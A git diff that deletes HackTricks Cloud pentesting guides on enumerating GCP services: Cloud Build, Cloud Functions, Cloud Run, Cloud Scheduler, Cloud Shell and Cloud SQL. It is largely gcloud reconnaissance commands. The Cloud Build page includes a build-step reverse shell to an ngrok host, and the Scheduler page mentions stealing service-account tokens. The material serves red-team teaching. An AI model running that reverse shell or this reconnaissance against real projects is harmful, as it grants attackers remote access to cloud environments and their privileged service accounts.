-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md deleted file mode 100644 index 18aef35d1..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-build-enum.md +++ /dev/null @@ -1,199 +0,0 @@ -# GCP - Cloud Build Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Build is a managed CI/CD platform that **automates software build** and release processes, integrating with **source code repositories** and supporting a wide range of programming languages. It **allows developers to build, test, and deploy code automatically** while providing flexibility to customize build steps and workflows. - -Each Cloud Build Trigger is **related to a Cloud Repository or directly connected with an external repository** (Github, Bitbucket and Gitlab). - -{% hint style="success" %} -I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a [https://source.cloud.google.com/](https://source.cloud.google.com/) URL and Github is not accessed by the client. -{% endhint %} - -### Events - -The Cloud Build can be triggered if: - -* **Push to a branch**: Specify the branch -* **Push a new tag**: Specify the tag -* P**ull request**: Specify the branch that receives the PR -* **Manual Invocation** -* **Pub/Sub message:** Specify the topic -* **Webhook event**: Will expose a HTTPS URL and the request must be authenticated with a secret - -### Execution - -There are 3 options: - -* A yaml/json **specifying the commands** to execute. Usually: `/cloudbuild.yaml` - * Only one that can be specified “inline” in the web console and in the cli - * Most common option - * Relevant for unauthenticated access -* A **Dockerfile** to build -* A **Buildpack** to build - -### SA Permissions - -The **Service Account has the `cloud-platform` scope**, so it can **use all the privileges.** If **no SA is specified** (like when doing submit) the **default SA** `@cloudbuild.gserviceaccount.com` will be **used.** - -By default no permissions are given but it's fairly easy to give it some: - -
- -### Approvals - -It's possible to config a Cloud Build to **require approvals for build executions** (disabled by default). - -### PR Approvals - -When the trigger is PR because **anyone can perform PRs to public repositories** it would be very dangerous to just **allow the execution of the trigger with any PR**. Therefore, by default, the execution will only be **automatic for owners and collaborators**, and in order to execute the trigger with other users PRs an owner or collaborator must comment `/gcbrun`. - -
- -### Connections & Repositories - -Connections can be created over: - -* **GitHub:** It will show an OAuth prompt asking for permissions to **get a Github token** that will be stored inside the **Secret Manager.** -* **GitHub Enterprise:** It will ask to install a **GithubApp**. An **authentication token** from your GitHub Enterprise host will be created and stored in this project as a S**ecret Manager** secret. -* **GitLab / Enterprise:** You need to **provide the API access token and the Read API access toke**n which will stored in the **Secret Manager.** - -Once a connection is generated, you can use it to **link repositories that the Github account has access** to. - -This option is available through the button: - -
- -{% hint style="success" %} -Note that repositories connected with this method are **only available in Triggers using 2nd generation.** -{% endhint %} - -### Connect a Repository - -This is not the same as a **`connection`**. This allows **different** ways to get **access to a Github or Bitbucket** repository but **doesn't generate a connection object, but it does generate a repository object (of 1st generation).** - -This option is available through the button: - -
- -### Storage - -Sometimes Cloud Build will **generate a new storage to store the files for the trigger**. This happens for example in the example that GCP offers with: - -```bash -git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \ - cd cloud-console-sample-build && \ - gcloud builds submit --config cloudbuild.yaml --region=global -``` - -A Storage bucket called [security-devbox\_cloudbuild](https://console.cloud.google.com/storage/browser/security-devbox_cloudbuild;tab=objects?forceOnBucketsSortingFiltering=false\&project=security-devbox) is created to store a `.tgz` with the files to be used. - -### Get shell - -```yaml -steps: - - name: bash - script: | - #!/usr/bin/env bash - bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1 -options: - logging: CLOUD_LOGGING_ONLY -``` - -Install gcloud inside cloud build: - -```bash -# https://stackoverflow.com/questions/28372328/how-to-install-the-google-cloud-sdk-in-a-docker-image -curl https://dl.google.com/dl/cloudsdk/release/google-cloud-sdk.tar.gz > /tmp/google-cloud-sdk.tar.gz -mkdir -p /usr/local/gcloud -tar -C /usr/local/gcloud -xvf /tmp/google-cloud-sdk.tar.gz -/usr/local/gcloud/google-cloud-sdk/install.sh -``` - -### Enumeration - -You could find **sensitive info in build configs and logs**. - -```bash -# Get configured triggers configurations -gcloud builds triggers list # Check for the words github and bitbucket -gcloud builds triggers describe - -# Get build executions -gcloud builds list -gcloud builds describe # Get even the build yaml if defined in there -gcloud builds log # Get build logs - -# List all connections of each region -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build connections in region: $region" - connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}") - if [[ ${#connections[@]} -eq 0 ]]; then - echo "No connections found in region $region." - else - for connection in $connections; do - echo "Describing connection $connection in region $region" - gcloud builds connections describe "$connection" --region="$region" - echo "-----------------------------------------" - done - fi - echo "=========================================" -done - -# List all worker-pools -regions=("${(@f)$(gcloud compute regions list --format='value(name)')}") -for region in $regions; do - echo "Listing build worker-pools in region: $region" - gcloud builds worker-pools list --region="$region" - echo "-----------------------------------------" -done -``` - -### Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudbuild-privesc.md" %} -[gcp-cloudbuild-privesc.md](../gcp-privilege-escalation/gcp-cloudbuild-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md" %} -[gcp-cloud-build-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-build-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md" %} -[gcp-cloud-build-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-build-post-exploitation.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md deleted file mode 100644 index f12757734..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-functions-enum.md +++ /dev/null @@ -1,135 +0,0 @@ -# GCP - Cloud Functions Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Functions - -[Google Cloud Functions](https://cloud.google.com/functions/) are designed to host your code, which **gets executed in response to events**, without necessitating the management of a host operating system. Additionally, these functions support the storage of environment variables, which the code can utilize. - -### Storage - -The Cloud Functions **code is stored in GCP Storage**. Therefore, anyone with **read access over buckets** in GCP is going to be able to **read the Cloud Functions code**.\ -The code is stored in a bucket like one of the following: - -* `gcf-sources--/-/version-/function-source.zip` -* `gcf-v2-sources--/function-source.zip` - -For example:\ -`gcf-sources-645468741258-us-central1/function-1-003dcbdf-32e1-430f-a5ff-785a6e238c76/version-4/function-source.zip` - -{% hint style="warning" %} -Any user with **read privileges over the bucket** storing the Cloud Function could **read the executed code**. -{% endhint %} - -### Artifact Registry - -If the cloud function is configured so the executed Docker container is stored inside and Artifact Registry repo inside the project, anyway with read access over the repo will be able to download the image and check the source code. For more info check: - -{% content-ref url="gcp-artifact-registry-enum.md" %} -[gcp-artifact-registry-enum.md](gcp-artifact-registry-enum.md) -{% endcontent-ref %} - -### SA - -If not specified, by default the **App Engine Default Service Account** with **Editor permissions** over the project will be attached to the Cloud Function. - -### Triggers, URL & Authentication - -When a Cloud Function is created the **trigger** needs to be specified. One common one is **HTTPS**, this will **create an URL where the function** can be triggered via web browsing.\ -Other triggers are pub/sub, Storage, Filestore... - -The URL format is **`https://-.cloudfunctions.net/`** - -When the HTTPS tigger is used, it's also indicated if the **caller needs to have IAM authorization** to call the Function or if **everyone** can just call it: - -
- -### Inside the Cloud Function - -The code is **downloaded inside** the folder **`/workspace`** with the same file names as the ones the files have in the Cloud Function and is executed with the user `www-data`.\ -The disk **isn't mounted as read-only.** - -### Enumeration - -```bash -# List functions -gcloud functions list -gcloud functions describe # Check triggers to see how is this function invoked -gcloud functions get-iam-policy - -# Get logs of previous runs. By default, limits to 10 lines -gcloud functions logs read --limit [NUMBER] - -# Call a function -curl https://-.cloudfunctions.net/ -gcloud functions call --data='{"message": "Hello World!"}' - -# If you know the name of projects you could try to BF cloud functions names - -# Get events that could be used to trigger a cloud function -gcloud functions event-types list - -# Access function with authentication -curl -X POST https://-.cloudfunctions.net/ \ --H "Authorization: bearer $(gcloud auth print-identity-token)" \ --H "Content-Type: application/json" \ --d '{}' -``` - -### Privilege Escalation - -In the following page, you can check how to **abuse cloud function permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md" %} -[gcp-cloudfunctions-privesc.md](../gcp-privilege-escalation/gcp-cloudfunctions-privesc.md) -{% endcontent-ref %} - -### Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md" %} -[gcp-cloud-functions-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-functions-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md" %} -[gcp-cloud-functions-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-functions-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-functions-persistence.md" %} -[gcp-cloud-functions-persistence.md](../gcp-persistence/gcp-cloud-functions-persistence.md) -{% endcontent-ref %} - -## References - -* [https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging](https://about.gitlab.com/blog/2020/02/12/plundering-gcp-escalating-privileges-in-google-cloud-platform/#reviewing-stackdriver-logging) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md deleted file mode 100644 index 82989eafc..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-run-enum.md +++ /dev/null @@ -1,137 +0,0 @@ -# GCP - Cloud Run Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Cloud Run - -Cloud Run is a serverless managed compute platform that lets you **run containers** directly on top of Google's scalable infrastructure. - -You can run your container or If you're using Go, Node.js, Python, Java, .NET Core, or Ruby, you can use the [source-based deployment](https://cloud.google.com/run/docs/deploying-source-code) option that **builds the container for you.** - -Google has built Cloud Run to **work well together with other services on Google Cloud**, so you can build full-featured applications. - -### Services and jobs - -On Cloud Run, your code can either run continuously as a _**service**_ or as a _**job**_. Both services and jobs run in the same environment and can use the same integrations with other services on Google Cloud. - -* **Cloud Run services.** Used to run code that responds to web requests, or events. -* **Cloud Run jobs.** Used to run code that performs work (a job) and quits when the work is done. - -## Cloud Run Service - -Google [Cloud Run](https://cloud.google.com/run) is another serverless offer where you can search for env variables also. Cloud Run creates a small web server, running on port 8080 inside the container by default, that sits around waiting for an HTTP GET request. When the request is received, a job is executed and the job log is output via an HTTP response. - -### Relevant details - -* By **default**, the **access** to the web server is **public**, but it can also be **limited to internal traffic** (VPC...)\ - Moreover, the **authentication** to contact the web server can be **allowing all** or to **require authentication via IAM**. -* By default, the **encryption** uses a **Google managed key**, but a **CMEK** (Customer Managed Encryption Key) from **KMS** can also be **chosen**. -* By **default**, the **service account** used is the **Compute Engine default one** which has **Editor** access over the project and it has the **scope `cloud-platform`.** -* It's possible to define **clear-text environment variables** for the execution, and even **mount cloud secrets** or **add cloud secrets to environment variables.** -* It's also possible to **add connections with Cloud SQL** and **mount a file system.** -* The **URLs** of the services deployed are similar to **`https://-.a.run.app`** -* A Run Service can have **more than 1 version or revision**, and **split traffic** among several revisions. - -### Enumeration - -```bash -# List services -gcloud run services list -gcloud run services list --platform=managed -gcloud run services list --platform=gke - -# Get info of a service -gcloud run services describe --region - -# Get info of all the services together -gcloud run services list --format=yaml -gcloud run services list --platform=managed --format=json -gcloud run services list --platform=gke --format=json - -# Get policy -gcloud run services get-iam-policy --region - -# Get revisions -gcloud run revisions list --region -gcloud run revisions describe --region - -# Get domains -gcloud run domain-mappings list -gcloud run domain-mappings describe - -# Attempt to trigger a job unauthenticated -curl - -# Attempt to trigger a job with your current gcloud authorization -curl -H "Authorization: Bearer $(gcloud auth print-identity-token)" -``` - -## Cloud Run Jobs - -Cloud Run jobs are be a better fit for **containers that run to completion and don't serve requests**. Jobs don't have the ability to serve requests or listen on a port. This means that unlike Cloud Run services, jobs should not bundle a web server. Instead, jobs containers should exit when they are done. - -### Enumeration - -```bash -gcloud beta run jobs list -gcloud beta run jobs describe --region -gcloud beta run jobs get-iam-policy --region -``` - -## Privilege Escalation - -In the following page, you can check how to **abuse cloud run permissions to escalate privileges**: - -{% content-ref url="../gcp-privilege-escalation/gcp-run-privesc.md" %} -[gcp-run-privesc.md](../gcp-privilege-escalation/gcp-run-privesc.md) -{% endcontent-ref %} - -## Unauthenticated Access - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md" %} -[gcp-cloud-run-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-run-unauthenticated-enum.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md" %} -[gcp-cloud-run-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-run-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-run-persistence.md" %} -[gcp-cloud-run-persistence.md](../gcp-persistence/gcp-cloud-run-persistence.md) -{% endcontent-ref %} - -## References - -* [https://cloud.google.com/run/docs/overview/what-is-cloud-run](https://cloud.google.com/run/docs/overview/what-is-cloud-run) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md deleted file mode 100644 index 1614bc5d2..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-scheduler-enum.md +++ /dev/null @@ -1,73 +0,0 @@ -# GCP - Cloud Scheduler Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Scheduler is a fully managed **cron job service** that allows you to run arbitrary jobs—such as batch, big data jobs, cloud infrastructure operations—at fixed times, dates, or intervals. It is integrated with Google Cloud services, providing a way to **automate various tasks like updates or batch processing on a regular schedule**. - -Although from an offensive point of view this sounds amazing, it actually isn't that interesting because the service just allow to schedule certain simple actions at a certain time and not to execute arbitrary code. - -At the moment of this writing these are the actions this service allows to schedule: - -
- -* **HTTP**: Send an HTTP request defining the headers and body of the request. -* **Pub/Sub**: Send a message into an specific topic -* **App Engine HTTP**: Send an HTTP request to an app built in App Engine -* **Workflows**: Call a GCP Workflow. - -## Service Accounts - -A service account is not always required by each scheduler. The **Pub/Sub** and **App Engine HTTP** types don't require any service account. The **Workflow** does require a service account, but it'll just invoke the workflow.\ -Finally, the regular HTTP type doesn't require a service account, but it's possible to indicate that some kind of auth is required by the workflow and add either an **OAuth token or an OIDC token to the sent** HTTP request. - -{% hint style="danger" %} -Therefore, it's possible to steal the **OIDC** token and abuse the **OAuth** token from service accounts **abusing the HTTP type**. More on this in the privilege escalation page. -{% endhint %} - -Note that it's possible to limit the scope of the OAuth token sent, however, by default, it'll be `cloud-platform`. - -## Enumeration - -```bash -# Get schedulers in a location -gcloud scheduler jobs list --location us-central1 - -# Get information of an specific scheduler -gcloud scheduler jobs describe --location us-central1 -``` - -## Privilege Escalation - -{% content-ref url="../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md" %} -[gcp-cloudscheduler-privesc.md](../gcp-privilege-escalation/gcp-cloudscheduler-privesc.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md deleted file mode 100644 index d03e8b288..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-shell-enum.md +++ /dev/null @@ -1,54 +0,0 @@ -# GCP - Cloud Shell Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud Shell is an interactive shell environment for Google Cloud Platform (GCP) that provides you with **command-line access to your GCP resources directly from your browser or shell**. It's a managed service provided by Google, and it comes with a **pre-installed set of tools**, making it easier to manage your GCP resources without having to install and configure these tools on your local machine.\ -Moreover, its offered at **no additional cost.** - -**Any user of the organization** (Workspace) is able to execute **`gcloud cloud-shell ssh`** and get access to his **cloudshell** environment. However, **Service Accounts can't**, even if they are owner of the organization. - -There **aren't** **permissions** assigned to this service, therefore the **aren't privilege escalation techniques**. Also there **isn't any kind of enumeration**. - -Note that Cloud Shell can be **easily disabled** for the organization. - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md" %} -[gcp-cloud-shell-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-shell-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-shell-persistence.md" %} -[gcp-cloud-shell-persistence.md](../gcp-persistence/gcp-cloud-shell-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md b/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md deleted file mode 100644 index ee69ced5a..000000000 --- a/pentesting-cloud/gcp-security/gcp-services/gcp-cloud-sql-enum.md +++ /dev/null @@ -1,115 +0,0 @@ -# GCP - Cloud SQL Enum - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Google Cloud SQL is a managed service that **simplifies setting up, maintaining, and administering relational databases** like MySQL, PostgreSQL, and SQL Server on Google Cloud Platform, removing the need to handle tasks like hardware provisioning, database setup, patching, and backups. - -Key features of Google Cloud SQL include: - -1. **Fully Managed**: Google Cloud SQL is a fully-managed service, meaning that Google handles database maintenance tasks like patching, updates, backups, and configuration. -2. **Scalability**: It provides the ability to scale your database's storage capacity and compute resources, often without downtime. -3. **High Availability**: Offers high availability configurations, ensuring your database services are reliable and can withstand zone or instance failures. -4. **Security**: Provides robust security features like data encryption, Identity and Access Management (IAM) controls, and network isolation using private IPs and VPC. -5. **Backups and Recovery**: Supports automatic backups and point-in-time recovery, helping you safeguard and restore your data. -6. **Integration**: Seamlessly integrates with other Google Cloud services, providing a comprehensive solution for building, deploying, and managing applications. -7. **Performance**: Offers performance metrics and diagnostics to monitor, troubleshoot, and improve database performance. - -### Password - -In the web console Cloud SQL allows the user to **set** the **password** of the database, there also a generate feature, but most importantly, **MySQL** allows to **leave an empty password and all of them allows to set as password just the char "a":** - -
- -It's also possible to configure a password policy requiring **length**, **complexity**, **disabling reuse** and **disabling username in password**. All are disabled by default. - -**SQL Server** can be configured with **Active Directory Authentication**. - -### Zone Availability - -The database can be **available in 1 zone or in multiple**, of course, it's recommended to have important databases in multiple zones. - -### Encryption - -By default a Google-managed encryption key is used, but it's also **possible to select a Customer-managed encryption key (CMEK)**. - -### Connections - -* **Private IP**: Indicate the VPC network and the database will get an private IP inside the network -* **Public IP**: The database will get a public IP, but by default no-one will be able to connect - * **Authorized networks**: Indicate public **IP ranges that should be allowed** to connect to the database -* **Private Path**: If the DB is connected in some VPC, it's possible to enable this option and give **other GCP services like BigQuery access over it** - -
- -### Data Protection - -* **Daily backups**: Perform automatic daily backups and indicate the number of backups you want to maintain. -* **Point-in-time recovery**: Allows you to recover data from a specific point in time, down to a fraction of a second. -* **Deletion Protection**: If enabled, the DB won't be able to be deleted until this feature is disabled - -### Enumeration - -```bash -# Get SQL instances -gcloud sql instances list -gcloud sql instances describe # get IPs, CACert, settings - -# Get database names inside an instance (like information_schema, sys...) -gcloud sql databases list --instance -gcloud sql databases describe --instance - -# Get usernames inside the db instance -gcloud sql users list --instance - -# Backups -gcloud sql backups list --instance -gcloud sql backups describe --instance -``` - -### Unauthenticated Enum - -{% content-ref url="../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md" %} -[gcp-cloud-sql-unauthenticated-enum.md](../gcp-unauthenticated-enum-and-access/gcp-cloud-sql-unauthenticated-enum.md) -{% endcontent-ref %} - -### Post Exploitation - -{% content-ref url="../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md" %} -[gcp-cloud-sql-post-exploitation.md](../gcp-post-exploitation/gcp-cloud-sql-post-exploitation.md) -{% endcontent-ref %} - -### Persistence - -{% content-ref url="../gcp-persistence/gcp-cloud-sql-persistence.md" %} -[gcp-cloud-sql-persistence.md](../gcp-persistence/gcp-cloud-sql-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
